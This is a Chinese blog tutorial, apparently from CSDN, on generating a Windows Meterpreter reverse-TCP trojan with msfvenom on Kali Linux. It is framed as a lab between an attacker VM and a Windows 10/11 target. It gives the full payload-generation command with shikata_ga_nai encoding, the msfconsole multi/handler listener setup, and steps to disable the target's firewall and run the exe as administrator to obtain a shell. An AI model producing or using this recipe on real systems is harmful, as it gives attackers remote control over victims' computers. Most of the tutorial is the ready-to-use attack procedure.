利用msf工具制作反向木马渗透

本文讲述了在KaliLinux上通过msfvenom生成WindowsMeterpreter反向连接木马,以及在目标机上执行的详细过程,包括环境配置和实际操作步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

概念概述


反向指攻击者的机器打开一个端口,目标机器运行反向payload来连接攻击机器的端口,从而建立连接

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。

环境准备


攻击机:kali IP:192.168.200.147

靶机:window11/10

在进行实验前,需要关闭靶机的防火墙;关闭防火墙的目的是让靶机放行进站入站的流量

实战

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.147 LPORT=4021 -e x86/shikata_ga_nai -f exe -o /home/kali/muma.exe

注释:

生成木马于/home/kali 目录下

windows/meterpreter/reverse_tcp :生成window 平台木马,需要尝试别的平台的小伙伴可以自行百度

192.168.200.147 : 为攻击机的IP,用来监听。

4021:自设置端口,要注意的是不要被其他的服务占用。

msfconsole 进入msf控制台

use exploit/multi/handler 使用模板

show payloads    查看配置

set lhost 192.168.200.147   本机监听IP    (这里改为你自己的ip)

set lport 4021     监听端口

run  运行

(此时监听端口已开启,放在一边,我们去搞事情)

随后把木马文件从目录中找出来,放进靶机。

右击以管理员运行exe文件,不出意外就成功啦

进入shell窗口后我们可以对靶机做一系列的实验,感兴趣的话可以自行百度

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值